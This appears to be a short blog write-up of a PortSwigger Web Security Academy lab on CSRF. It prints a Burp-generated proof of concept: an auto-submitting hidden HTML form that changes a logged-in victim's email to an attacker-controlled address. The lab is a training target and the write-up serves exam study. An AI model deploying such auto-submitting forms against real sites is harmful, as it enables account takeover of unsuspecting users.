Hello Friends,
I’m Rem01x And I’m Currently Preparing For The eWPTX Exam So I Will Be Walking Through All PortSwigger Labs And Make Sure To Make Writeups For All Of Them.
Let’s Start Now.
Assume that we have this website.
Please notice the my account option on the top right.
Let’s navigate to it and see what we could do there.
As we observed this is a login page so let’s provide our credentials to be able to login.
As we notice we will try to update our email to [email protected].
Did you notice something !?
Yeah you are right there is no CSRF Token in the request so let’s try generate CSRF PoC.
Now, let’s see the PoC.
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<form action="<https://0aec0065031dc4ba80dae90000290027.web-security-academy.net/my-account/change-email>" method="POST">
<input type="hidden" name="email" value="attacker1@attacker.com" />
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>
